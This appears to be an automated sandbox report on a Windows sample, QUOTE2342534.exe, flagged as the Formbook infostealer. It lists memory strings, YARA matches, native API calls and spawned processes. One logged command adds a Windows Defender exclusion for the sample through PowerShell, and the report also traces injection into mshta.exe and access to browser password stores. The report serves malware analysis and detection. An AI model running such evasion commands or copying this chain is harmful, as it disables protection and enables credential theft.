            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org/WPFooter
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org/WPHeader
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/#/schema/logo/image/
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/#organization
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/#website
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/%e0%b8%9a%e0%b8%97%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1/
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/?s=
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/about-us/
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/comments/feed/
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/contact-us/
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/feed/
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/login/
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/privacy-policy-2/
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/promotion/
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/register
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/sitemap_index.xml
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/slot-online/
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/terms-and-conditions/
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/wp-content/uploads/2024/08/5.png
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/wp-content/uploads/2024/10/COBA-168-
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/wp-content/uploads/2024/10/cropped-COBA-168-
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/wp-json/
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/xmlrpc.php?rsd
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/

            E-Banking Fraud

            Source: Yara matchFile source: 4.2.QUOTE2342534.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.QUOTE2342534.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4597123623.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2232369881.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2233350481.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 4.2.QUOTE2342534.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.QUOTE2342534.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4597123623.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2232369881.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2233350481.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 0_2_089F2CA8 NtQueryInformationProcess,0_2_089F2CA8
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 0_2_089F2CA0 NtQueryInformationProcess,0_2_089F2CA0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_0042C4E3 NtClose,4_2_0042C4E3
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762B60 NtClose,LdrInitializeThunk,4_2_01762B60
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01762DF0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01762C70
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_017635C0 NtCreateMutant,LdrInitializeThunk,4_2_017635C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01764340 NtSetContextThread,4_2_01764340
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01764650 NtSuspendThread,4_2_01764650
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762BF0 NtAllocateVirtualMemory,4_2_01762BF0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762BE0 NtQueryValueKey,4_2_01762BE0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762BA0 NtEnumerateValueKey,4_2_01762BA0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762B80 NtQueryInformationFile,4_2_01762B80
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762AF0 NtWriteFile,4_2_01762AF0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762AD0 NtReadFile,4_2_01762AD0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762AB0 NtWaitForSingleObject,4_2_01762AB0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762D30 NtUnmapViewOfSection,4_2_01762D30
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762D10 NtMapViewOfSection,4_2_01762D10
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762D00 NtSetInformationFile,4_2_01762D00
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762DD0 NtDelayExecution,4_2_01762DD0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762DB0 NtEnumerateKey,4_2_01762DB0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762C60 NtCreateKey,4_2_01762C60
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762C00 NtQueryInformationProcess,4_2_01762C00
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762CF0 NtOpenProcess,4_2_01762CF0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762CC0 NtQueryVirtualMemory,4_2_01762CC0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762CA0 NtQueryInformationToken,4_2_01762CA0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762F60 NtCreateProcessEx,4_2_01762F60
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762F30 NtCreateSection,4_2_01762F30
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762FE0 NtCreateFile,4_2_01762FE0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762FB0 NtResumeThread,4_2_01762FB0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762FA0 NtQuerySection,4_2_01762FA0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762F90 NtProtectVirtualMemory,4_2_01762F90
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762E30 NtWriteVirtualMemory,4_2_01762E30
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762EE0 NtQueueApcThread,4_2_01762EE0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762EA0 NtAdjustPrivilegesToken,4_2_01762EA0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01762E80 NtReadVirtualMemory,4_2_01762E80
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01763010 NtOpenDirectoryObject,4_2_01763010
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01763090 NtSetValueKey,4_2_01763090
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_017639B0 NtGetContextThread,4_2_017639B0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01763D70 NtOpenThread,4_2_01763D70
            Source: C:\Users\user\Desktop\QUOTE2342534.exe, Code function: 4_2_01763D10 NtOpenProcessToken,4_2_01763D10
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03884340 NtSetContextThread,LdrInitializeThunk,8_2_03884340
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03884650 NtSuspendThread,LdrInitializeThunk,8_2_03884650
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_03882BA0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882BE0 NtQueryValueKey,LdrInitializeThunk,8_2_03882BE0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03882BF0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882B60 NtClose,LdrInitializeThunk,8_2_03882B60
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882AD0 NtReadFile,LdrInitializeThunk,8_2_03882AD0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882AF0 NtWriteFile,LdrInitializeThunk,8_2_03882AF0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882FB0 NtResumeThread,LdrInitializeThunk,8_2_03882FB0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882FE0 NtCreateFile,LdrInitializeThunk,8_2_03882FE0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882F30 NtCreateSection,LdrInitializeThunk,8_2_03882F30
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_03882E80
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882EE0 NtQueueApcThread,LdrInitializeThunk,8_2_03882EE0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882DD0 NtDelayExecution,LdrInitializeThunk,8_2_03882DD0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03882DF0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882D10 NtMapViewOfSection,LdrInitializeThunk,8_2_03882D10
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_03882D30
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_03882CA0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882C60 NtCreateKey,LdrInitializeThunk,8_2_03882C60
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03882C70
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_038835C0 NtCreateMutant,LdrInitializeThunk,8_2_038835C0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_038839B0 NtGetContextThread,LdrInitializeThunk,8_2_038839B0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882B80 NtQueryInformationFile,8_2_03882B80
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882AB0 NtWaitForSingleObject,8_2_03882AB0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882F90 NtProtectVirtualMemory,8_2_03882F90
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882FA0 NtQuerySection,8_2_03882FA0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882F60 NtCreateProcessEx,8_2_03882F60
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882EA0 NtAdjustPrivilegesToken,8_2_03882EA0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882E30 NtWriteVirtualMemory,8_2_03882E30
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882DB0 NtEnumerateKey,8_2_03882DB0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882D00 NtSetInformationFile,8_2_03882D00
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882CC0 NtQueryVirtualMemory,8_2_03882CC0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882CF0 NtOpenProcess,8_2_03882CF0
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03882C00 NtQueryInformationProcess,8_2_03882C00
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03883090 NtSetValueKey,8_2_03883090
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03883010 NtOpenDirectoryObject,8_2_03883010
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03883D10 NtOpenProcessToken,8_2_03883D10
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_03883D70 NtOpenThread,8_2_03883D70
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_02F48E10 NtCreateFile,8_2_02F48E10
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_02F48F80 NtReadFile,8_2_02F48F80
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_02F49280 NtAllocateVirtualMemory,8_2_02F49280
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_02F49070 NtDeleteFile,8_2_02F49070
            Source: C:\Windows\SysWOW64\mshta.exe, Code function: 8_2_02F49110 NtClose,8_2_02F49110
            Source: QUOTE2342534.exe, 00000000.00000002.2140837926.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs QUOTE2342534.exe
            Source: QUOTE2342534.exe, 00000000.00000002.2156658228.000000000B860000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs QUOTE2342534.exe
            Source: QUOTE2342534.exe, 00000004.00000002.2232503719.000000000181D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTE2342534.exe
            Source: QUOTE2342534.exe, 00000004.00000002.2232065125.0000000001197000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMSHTA.EXED vs QUOTE2342534.exe
            Source: QUOTE2342534.exe, 00000004.00000002.2232065125.00000000011A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMSHTA.EXED vs QUOTE2342534.exe
            Source: QUOTE2342534.exe Binary or memory string: OriginalFilenameiFFZ.exe> vs QUOTE2342534.exe
            Source: QUOTE2342534.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Matched rule (identical for every source listed below): Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.QUOTE2342534.exe.400000.0.unpack, type: UNPACKEDPE
            Source: 4.2.QUOTE2342534.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: 00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: 00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 0000000A.00000002.4597123623.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000004.00000002.2232369881.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000004.00000002.2233350481.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: QUOTE2342534.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, b9hATX05wLpDVq4ne4.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, b9hATX05wLpDVq4ne4.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, b9hATX05wLpDVq4ne4.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, b9hATX05wLpDVq4ne4.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, RgTGNHbnx4wRLD1BjK.cs Security API names: _0020.SetAccessControl
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, RgTGNHbnx4wRLD1BjK.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, RgTGNHbnx4wRLD1BjK.cs Security API names: _0020.AddAccessRule
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, RgTGNHbnx4wRLD1BjK.cs Security API names: _0020.SetAccessControl
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, RgTGNHbnx4wRLD1BjK.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, RgTGNHbnx4wRLD1BjK.cs Security API names: _0020.AddAccessRule
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/7@16/11
            Source: C:\Users\user\Desktop\QUOTE2342534.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTE2342534.exe.log
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2360:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztmdjh4q.hu2.ps1
            Source: QUOTE2342534.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\QUOTE2342534.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: mshta.exe, 00000008.00000002.4592995544.0000000003029000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.4592995544.000000000305C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2413656101.000000000305C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2413656101.0000000003029000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: QUOTE2342534.exe ReversingLabs: Detection: 28%
            Source: unknown Process created: C:\Users\user\Desktop\QUOTE2342534.exe "C:\Users\user\Desktop\QUOTE2342534.exe"
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe"
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Process created: C:\Users\user\Desktop\QUOTE2342534.exe "C:\Users\user\Desktop\QUOTE2342534.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"
            Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, textshaping.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
